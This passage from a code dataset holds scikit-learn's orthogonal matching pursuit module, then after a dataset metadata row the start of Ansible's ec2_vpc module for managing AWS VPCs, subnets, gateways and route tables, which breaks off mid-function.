if abs(tol_curr) <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
copy_X=True, return_path=False,
return_n_iter=False):
"""Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems.
An instance of the problem has the form:
When parametrized by the number of non-zero coefficients using
`n_nonzero_coefs`:
argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}
When parametrized by error using the parameter `tol`:
argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
X : array, shape (n_samples, n_features)
Input data. Columns are assumed to have unit norm.
y : array, shape (n_samples,) or (n_samples, n_targets)
Input targets
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
precompute : {True, False, 'auto'},
Whether to perform precomputations. Improves performance when n_targets
or n_samples is very large.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp_gram
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
X = check_array(X, order='F', copy=copy_X)
copy_X = False
if y.ndim == 1:
y = y.reshape(-1, 1)
y = check_array(y)
if y.shape[1] > 1: # subsequent targets will be affected
copy_X = True
if n_nonzero_coefs is None and tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > X.shape[1]:
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if precompute == 'auto':
precompute = X.shape[0] > X.shape[1]
if precompute:
G = np.dot(X.T, X)
G = np.asfortranarray(G)
Xy = np.dot(X.T, y)
if tol is not None:
norms_squared = np.sum((y ** 2), axis=0)
else:
norms_squared = None
return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
copy_Gram=copy_X, copy_Xy=False,
return_path=return_path)
if return_path:
coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
else:
coef = np.zeros((X.shape[1], y.shape[1]))
n_iters = []
for k in range(y.shape[1]):
out = _cholesky_omp(
X, y[:, k], n_nonzero_coefs, tol,
copy_X=copy_X, return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if y.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
norms_squared=None, copy_Gram=True,
copy_Xy=True, return_path=False,
return_n_iter=False):
"""Gram Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems using only
the Gram matrix X.T * X and the product X.T * y.
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data: X.T * X
Xy : array, shape (n_features,) or (n_features, n_targets)
Input targets multiplied by X: X.T * y
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
norms_squared : array-like, shape (n_targets,)
Squared L2 norms of the lines of y. Required if tol is not None.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
Gram = check_array(Gram, order='F', copy=copy_Gram)
Xy = np.asarray(Xy)
if Xy.ndim > 1 and Xy.shape[1] > 1:
# or subsequent target will be affected
copy_Gram = True
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if tol is not None:
norms_squared = [norms_squared]
if n_nonzero_coefs is None and tol is None:
n_nonzero_coefs = int(0.1 * len(Gram))
if tol is not None and norms_squared is None:
raise ValueError('Gram OMP needs the precomputed norms in order '
'to evaluate the error sum of squares.')
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > len(Gram):
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if return_path:
coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
else:
coef = np.zeros((len(Gram), Xy.shape[1]))
n_iters = []
for k in range(Xy.shape[1]):
out = _gram_omp(
Gram, Xy[:, k], n_nonzero_coefs,
norms_squared[k] if tol is not None else None, tol,
copy_Gram=copy_Gram, copy_Xy=copy_Xy,
return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if Xy.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
"""Orthogonal Matching Pursuit model (OMP)
Parameters
----------
n_nonzero_coefs : int, optional
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float, optional
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
precompute : {True, False, 'auto'}, default 'auto'
Whether to use a precomputed Gram and Xy matrix to speed up
calculations. Improves performance when `n_targets` or `n_samples` is
very large. Note that if you already have such matrices, you can pass
them directly to the fit method.
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
coef_ : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the formula)
intercept_ : float or array, shape (n_targets,)
independent term in decision function.
n_iter_ : int or array-like
Number of active features across every target.
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
decomposition.sparse_encode
"""
def __init__(self, n_nonzero_coefs=None, tol=None, fit_intercept=True,
normalize=True, precompute='auto'):
self.n_nonzero_coefs = n_nonzero_coefs
self.tol = tol
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
n_features = X.shape[1]
X, y, X_mean, y_mean, X_std, Gram, Xy = \
_pre_fit(X, y, None, self.precompute, self.normalize,
self.fit_intercept, copy=True)
if y.ndim == 1:
y = y[:, np.newaxis]
if self.n_nonzero_coefs is None and self.tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
else:
self.n_nonzero_coefs_ = self.n_nonzero_coefs
if Gram is False:
coef_, self.n_iter_ = orthogonal_mp(
X, y, self.n_nonzero_coefs_, self.tol,
precompute=False, copy_X=True,
return_n_iter=True)
else:
norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
coef_, self.n_iter_ = orthogonal_mp_gram(
Gram, Xy=Xy, n_nonzero_coefs=self.n_nonzero_coefs_,
tol=self.tol, norms_squared=norms_sq,
copy_Gram=True, copy_Xy=True,
return_n_iter=True)
self.coef_ = coef_.T
self._set_intercept(X_mean, y_mean, X_std)
return self
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
fit_intercept=True, normalize=True, max_iter=100):
"""Compute the residues on left-out data for a full LARS path
Parameters
-----------
X_train : array, shape (n_samples, n_features)
The data to fit the LARS on
y_train : array, shape (n_samples)
The target variable to fit LARS on
X_test : array, shape (n_samples, n_features)
The data to compute the residues on
y_test : array, shape (n_samples)
The target variable to compute the residues on
copy : boolean, optional
Whether X_train, X_test, y_train and y_test should be copied. If
False, they may be overwritten.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 100 by default.
Returns
-------
residues: array, shape (n_samples, max_features)
Residues of the prediction on the test data
"""
if copy:
X_train = X_train.copy()
y_train = y_train.copy()
X_test = X_test.copy()
y_test = y_test.copy()
if fit_intercept:
X_mean = X_train.mean(axis=0)
X_train -= X_mean
X_test -= X_mean
y_mean = y_train.mean(axis=0)
y_train = as_float_array(y_train, copy=False)
y_train -= y_mean
y_test = as_float_array(y_test, copy=False)
y_test -= y_mean
if normalize:
norms = np.sqrt(np.sum(X_train ** 2, axis=0))
nonzeros = np.flatnonzero(norms)
X_train[:, nonzeros] /= norms[nonzeros]
coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
precompute=False, copy_X=False,
return_path=True)
if coefs.ndim == 1:
coefs = coefs[:, np.newaxis]
if normalize:
coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]
return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
"""Cross-validated Orthogonal Matching Pursuit model (OMP)
Parameters
----------
copy : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 10% of ``n_features`` but at least 5 if available.
cv : cross-validation generator, optional
see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
a 5-fold strategy
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs
verbose : boolean or integer, optional
Sets the verbosity amount
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
intercept_ : float or array, shape (n_targets,)
Independent term in decision function.
coef_ : array, shape (n_features,) or (n_features, n_targets)
Parameter vector (w in the problem formulation).
n_nonzero_coefs_ : int
Estimated number of non-zero coefficients giving the best mean squared
error over the cross-validation folds.
n_iter_ : int or array-like
Number of active features across every target for the model refit with
the best hyperparameters got by cross-validating across all folds.
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
OrthogonalMatchingPursuit
LarsCV
LassoLarsCV
decomposition.sparse_encode
"""
def __init__(self, copy=True, fit_intercept=True, normalize=True,
max_iter=None, cv=None, n_jobs=1, verbose=False):
self.copy = copy
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape [n_samples, n_features]
Training data.
y : array-like, shape [n_samples]
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, y_numeric=True)
X = as_float_array(X, copy=False, force_all_finite=False)
cv = check_cv(self.cv, X, y, classifier=False)
max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
if not self.max_iter
else self.max_iter)
cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_omp_path_residues)(
X[train], y[train], X[test], y[test], self.copy,
self.fit_intercept, self.normalize, max_iter)
for train, test in cv)
min_early_stop = min(fold.shape[0] for fold in cv_paths)
mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
for fold in cv_paths])
best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
self.n_nonzero_coefs_ = best_n_nonzero_coefs
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
fit_intercept=self.fit_intercept,
normalize=self.normalize)
omp.fit(X, y)
self.coef_ = omp.coef_
self.intercept_ = omp.intercept_
self.n_iter_ = omp.n_iter_
return self
| bsd-3-clause | 2,974,351,446,800,531,500 | 34.784706 | 79 | 0.602328 | false |
davidobrien1985/ansible-modules-core | cloud/amazon/ec2_vpc.py | 6 | 29668 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc
short_description: configure AWS virtual private clouds
description:
- Create or terminates AWS virtual private clouds. This module has a dependency on python-boto.
version_added: "1.4"
options:
cidr_block:
description:
- "The cidr block representing the VPC, e.g. 10.0.0.0/16"
required: false, unless state=present
instance_tenancy:
description:
- "The supported tenancy options for instances launched into the VPC."
required: false
default: "default"
choices: [ "default", "dedicated" ]
dns_support:
description:
- toggles the "Enable DNS resolution" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
dns_hostnames:
description:
- toggles the "Enable DNS hostname support for instances" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
subnets:
description:
- 'A dictionary array of subnets to add of the form: { cidr: ..., az: ... , resource_tags: ... }. Where az is the desired availability zone of the subnet, but it is not required. Tags (i.e.: resource_tags) is also optional and use dictionary form: { "Environment":"Dev", "Tier":"Web", ...}. All VPC subnets not in this list will be removed as well. As of 1.8, if the subnets parameter is not specified, no existing subnets will be modified.'
required: false
default: null
resource_tags: See resource_tags for VPC below. The main difference is subnet tags not specified here will be deleted.
vpc_id:
description:
- A VPC id to terminate when state=absent
required: false
default: null
resource_tags:
description:
- 'A dictionary array of resource tags of the form: { tag1: value1, tag2: value2 }. Tags in this list are used in conjunction with CIDR block to uniquely identify a VPC in lieu of vpc_id. Therefore, if CIDR/Tag combination does not exist, a new VPC will be created. VPC tags not on this list will be ignored. Prior to 1.7, specifying a resource tag was optional.'
required: true
version_added: "1.6"
internet_gateway:
description:
- Toggle whether there should be an Internet gateway attached to the VPC
required: false
default: "no"
choices: [ "yes", "no" ]
route_tables:
description:
- 'A dictionary array of route tables to add of the form: { subnets: [172.22.2.0/24, 172.22.3.0/24,], routes: [{ dest: 0.0.0.0/0, gw: igw},], resource_tags: ... }. Where the subnets list is those subnets the route table should be associated with, and the routes list is a list of routes to be in the table. The special keyword for the gw of igw specifies that you should the route should go through the internet gateway attached to the VPC. gw also accepts instance-ids, interface-ids, and vpc-peering-connection-ids in addition igw. resource_tags is optional and uses dictionary form: { "Name": "public", ... }. This module is currently unable to affect the "main" route table due to some limitations in boto, so you must explicitly define the associated subnets or they will be attached to the main table implicitly. As of 1.8, if the route_tables parameter is not specified, no existing routes will be modified.'
required: false
default: null
wait:
description:
- wait for the VPC to be in state 'available' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
state:
description:
- Create or terminate the VPC
required: true
choices: [ "present", "absent" ]
author: "Carson Gee (@carsongee)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic creation example:
ec2_vpc:
state: present
cidr_block: 172.23.0.0/16
resource_tags: { "Environment":"Development" }
region: us-west-2
# Full creation example with subnets and optional availability zones.
# The absence or presence of subnets deletes or creates them respectively.
ec2_vpc:
state: present
cidr_block: 172.22.0.0/16
resource_tags: { "Environment":"Development" }
subnets:
- cidr: 172.22.1.0/24
az: us-west-2c
resource_tags: { "Environment":"Dev", "Tier" : "Web" }
- cidr: 172.22.2.0/24
az: us-west-2b
resource_tags: { "Environment":"Dev", "Tier" : "App" }
- cidr: 172.22.3.0/24
az: us-west-2a
resource_tags: { "Environment":"Dev", "Tier" : "DB" }
internet_gateway: True
route_tables:
- subnets:
- 172.22.2.0/24
- 172.22.3.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
- subnets:
- 172.22.1.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
region: us-west-2
register: vpc
# Removal of a VPC by id
ec2_vpc:
state: absent
vpc_id: vpc-aaaaaaa
region: us-west-2
If you have added elements not managed by this module, e.g. instances, NATs, etc then
the delete will fail until those dependencies are removed.
'''
import time
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_vpc_info(vpc):
"""
Retrieves vpc information from an instance
ID and returns it as a dictionary
"""
return({
'id': vpc.id,
'cidr_block': vpc.cidr_block,
'dhcp_options_id': vpc.dhcp_options_id,
'region': vpc.region.name,
'state': vpc.state,
})
def find_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Finds a VPC that matches a specific id or cidr + tags
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A VPC object that matches either an ID or CIDR and one or more tag values
"""
if vpc_id == None and cidr == None:
module.fail_json(
msg='You must specify either a vpc_id or a cidr block + list of unique tags, aborting'
)
found_vpcs = []
resource_tags = module.params.get('resource_tags')
# Check for existing VPC by cidr_block or id
if vpc_id is not None:
found_vpcs = vpc_conn.get_all_vpcs(None, {'vpc-id': vpc_id, 'state': 'available',})
else:
previous_vpcs = vpc_conn.get_all_vpcs(None, {'cidr': cidr, 'state': 'available'})
for vpc in previous_vpcs:
# Get all tags for each of the found VPCs
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
# If the supplied list of ID Tags match a subset of the VPC Tags, we found our VPC
if resource_tags and set(resource_tags.items()).issubset(set(vpc_tags.items())):
found_vpcs.append(vpc)
found_vpc = None
if len(found_vpcs) == 1:
found_vpc = found_vpcs[0]
if len(found_vpcs) > 1:
module.fail_json(msg='Found more than one vpc based on the supplied criteria, aborting')
return (found_vpc)
def routes_match(rt_list=None, rt=None, igw=None):
"""
Check if the route table has all routes as in given list
rt_list : A list if routes provided in the module
rt : The Remote route table object
igw : The internet gateway object for this vpc
Returns:
True when there provided routes and remote routes are the same.
False when provided routes and remote routes are different.
"""
local_routes = []
remote_routes = []
for route in rt_list:
route_kwargs = {
'gateway_id': None,
'instance_id': None,
'interface_id': None,
'vpc_peering_connection_id': None,
'state': 'active'
}
if route['gw'] == 'igw':
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
route_kwargs['destination_cidr_block'] = route['dest']
local_routes.append(route_kwargs)
for j in rt.routes:
remote_routes.append(j.__dict__)
match = []
for i in local_routes:
change = "false"
for j in remote_routes:
if set(i.items()).issubset(set(j.items())):
change = "true"
match.append(change)
if 'false' in match:
return False
else:
return True
def rtb_changed(route_tables=None, vpc_conn=None, module=None, vpc=None, igw=None):
"""
Checks if the remote routes match the local routes.
route_tables : Route_tables parameter in the module
vpc_conn : The VPC conection object
module : The module object
vpc : The vpc object for this route table
igw : The internet gateway object for this vpc
Returns:
True when there is difference between the provided routes and remote routes and if subnet associations are different.
False when both routes and subnet associations matched.
"""
#We add a one for the main table
rtb_len = len(route_tables) + 1
remote_rtb_len = len(vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id}))
if remote_rtb_len != rtb_len:
return True
for rt in route_tables:
rt_id = None
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
nrt = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id, 'association.subnet-id': rsn[0].id})
if not nrt:
return True
else:
nrt = nrt[0]
if not rt_id:
rt_id = nrt.id
if not routes_match(rt['routes'], nrt, igw):
return True
continue
else:
if rt_id == nrt.id:
continue
else:
return True
return True
return False
def create_vpc(module, vpc_conn):
"""
Creates a new or modifies an existing VPC.
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A dictionary with information
about the VPC and subnets that were launched
"""
id = module.params.get('vpc_id')
cidr_block = module.params.get('cidr_block')
instance_tenancy = module.params.get('instance_tenancy')
dns_support = module.params.get('dns_support')
dns_hostnames = module.params.get('dns_hostnames')
subnets = module.params.get('subnets')
internet_gateway = module.params.get('internet_gateway')
route_tables = module.params.get('route_tables')
vpc_spec_tags = module.params.get('resource_tags')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check for existing VPC by cidr_block + tags or id
previous_vpc = find_vpc(module, vpc_conn, id, cidr_block)
if previous_vpc is not None:
changed = False
vpc = previous_vpc
else:
changed = True
try:
vpc = vpc_conn.create_vpc(cidr_block, instance_tenancy)
# wait here until the vpc is available
pending = True
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time() and pending:
try:
pvpc = vpc_conn.get_all_vpcs(vpc.id)
if hasattr(pvpc, 'state'):
if pvpc.state == "available":
pending = False
elif hasattr(pvpc[0], 'state'):
if pvpc[0].state == "available":
pending = False
# sometimes vpc_conn.create_vpc() will return a vpc that can't be found yet by vpc_conn.get_all_vpcs()
# when that happens, just wait a bit longer and try again
except boto.exception.BotoServerError, e:
if e.error_code != 'InvalidVpcID.NotFound':
raise
if pending:
time.sleep(5)
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "wait for vpc availability timeout on %s" % time.asctime())
except boto.exception.BotoServerError, e:
module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message))
# Done with base VPC, now change to attributes and features.
# Add resource tags
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
if not set(vpc_spec_tags.items()).issubset(set(vpc_tags.items())):
new_tags = {}
for (key, value) in set(vpc_spec_tags.items()):
if (key, value) not in set(vpc_tags.items()):
new_tags[key] = value
if new_tags:
vpc_conn.create_tags(vpc.id, new_tags)
# boto doesn't appear to have a way to determine the existing
# value of the dns attributes, so we just set them.
# It also must be done one at a time.
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_support=dns_support)
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_hostnames=dns_hostnames)
# Process all subnet properties
if subnets is not None:
if not isinstance(subnets, list):
module.fail_json(msg='subnets needs to be a list of cidr blocks')
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
# First add all new subnets
for subnet in subnets:
add_subnet = True
subnet_tags_current = True
new_subnet_tags = subnet.get('resource_tags', None)
subnet_tags_delete = []
for csn in current_subnets:
if subnet['cidr'] == csn.cidr_block:
add_subnet = False
# Check if AWS subnet tags are in playbook subnet tags
subnet_tags_extra = (set(csn.tags.items()).issubset(set(new_subnet_tags.items())))
# Check if subnet tags in playbook are in AWS subnet tags
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_extra is False:
try:
for item in csn.tags.items():
if item not in new_subnet_tags.items():
subnet_tags_delete.append(item)
subnet_tags_delete = [key[0] for key in subnet_tags_delete]
delete_subnet_tag = vpc_conn.delete_tags(csn.id, subnet_tags_delete)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete resource tag, error {0}'.format(e))
# Add new subnet tags if not current
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_current is not True:
try:
changed = True
create_subnet_tag = vpc_conn.create_tags(csn.id, new_subnet_tags)
except EC2ResponseError, e:
module.fail_json(msg='Unable to create resource tag, error: {0}'.format(e))
if add_subnet:
try:
new_subnet = vpc_conn.create_subnet(vpc.id, subnet['cidr'], subnet.get('az', None))
new_subnet_tags = subnet.get('resource_tags', None)
if new_subnet_tags:
# Sometimes AWS takes its time to create a subnet and so using new subnets's id
# to create tags results in exception.
# boto doesn't seem to refresh 'state' of the newly created subnet, i.e.: it's always 'pending'
# so i resorted to polling vpc_conn.get_all_subnets with the id of the newly added subnet
while len(vpc_conn.get_all_subnets(filters={ 'subnet-id': new_subnet.id })) == 0:
time.sleep(0.1)
vpc_conn.create_tags(new_subnet.id, new_subnet_tags)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create subnet {0}, error: {1}'.format(subnet['cidr'], e))
# Now delete all absent subnets
for csubnet in current_subnets:
delete_subnet = True
for subnet in subnets:
if csubnet.cidr_block == subnet['cidr']:
delete_subnet = False
if delete_subnet:
try:
vpc_conn.delete_subnet(csubnet.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete subnet {0}, error: {1}'.format(csubnet.cidr_block, e))
# Handle Internet gateway (create/delete igw)
igw = None
igw_id = None
igws = vpc_conn.get_all_internet_gateways(filters={'attachment.vpc-id': vpc.id})
if len(igws) > 1:
module.fail_json(msg='EC2 returned more than one Internet Gateway for id %s, aborting' % vpc.id)
if internet_gateway:
if len(igws) != 1:
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create Internet Gateway, error: {0}'.format(e))
else:
# Set igw variable to the current igw instance for use in route tables.
igw = igws[0]
else:
if len(igws) > 0:
try:
vpc_conn.detach_internet_gateway(igws[0].id, vpc.id)
vpc_conn.delete_internet_gateway(igws[0].id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete Internet Gateway, error: {0}'.format(e))
if igw is not None:
igw_id = igw.id
# Handle route tables - this may be worth splitting into a
# different module but should work fine here. The strategy to stay
# indempotent is to basically build all the route tables as
# defined, track the route table ids, and then run through the
# remote list of route tables and delete any that we didn't
# create. This shouldn't interrupt traffic in theory, but is the
# only way to really work with route tables over time that I can
# think of without using painful aws ids. Hopefully boto will add
# the replace-route-table API to make this smoother and
# allow control of the 'main' routing table.
if route_tables is not None:
rtb_needs_change = rtb_changed(route_tables, vpc_conn, module, vpc, igw)
if route_tables is not None and rtb_needs_change:
if not isinstance(route_tables, list):
module.fail_json(msg='route tables need to be a list of dictionaries')
# Work through each route table and update/create to match dictionary array
all_route_tables = []
for rt in route_tables:
try:
